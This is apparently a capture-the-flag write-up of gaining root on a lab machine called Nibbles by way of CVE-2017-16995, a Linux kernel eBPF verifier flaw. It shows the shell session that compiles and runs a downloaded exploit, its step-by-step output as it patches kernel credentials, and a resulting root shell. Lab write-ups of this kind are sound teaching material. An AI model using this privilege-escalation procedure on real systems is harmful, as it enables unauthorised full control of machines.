PEAS discovered that the target system is vulnerable to CVE-2017-16995

CVE-2017-16995


A vulnerability classified as critical has been found in the Linux kernel up to version 4.14.8 (Operating System). Affected is the function check_alu_op in the file kernel/bpf/verifier.c, in the component Sign Extension. Manipulation with an unknown input leads to a memory corruption vulnerability. The issue is classified as CWE-119: the software performs operations on a memory buffer, but it can read from or write to a memory location that is outside the intended boundary of the buffer. This impacts confidentiality, integrity, and availability.

Exploit


I found the exploit online

Privilege Escalation


nibbler@nibbles:/tmp$ gcc CVE-2017-16995.c -o CVE-2017-16995
nibbler@nibbles:/tmp$ ./CVE-2017-16995
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880005973100
[*] Leaking sock struct from ffff88003837d400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003234a0c0
[*] uid from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff88003234a0c0
[*] credentials patched, launching shell...
# whoami
root
# hostname
Nibbles
# ifconfig
ens192    Link encap:Ethernet  HWaddr 00:50:56:b9:48:c7  
          inet addr:10.10.10.75  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:48c7/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:48c7/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:4188 errors:0 dropped:15 overruns:0 frame:0
          TX packets:3738 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1208346 (1.2 MB)  TX bytes:1166370 (1.1 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:160 errors:0 dropped:0 overruns:0 frame:0
          TX packets:160 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:11840 (11.8 KB)  TX bytes:11840 (11.8 KB)

System Level Compromise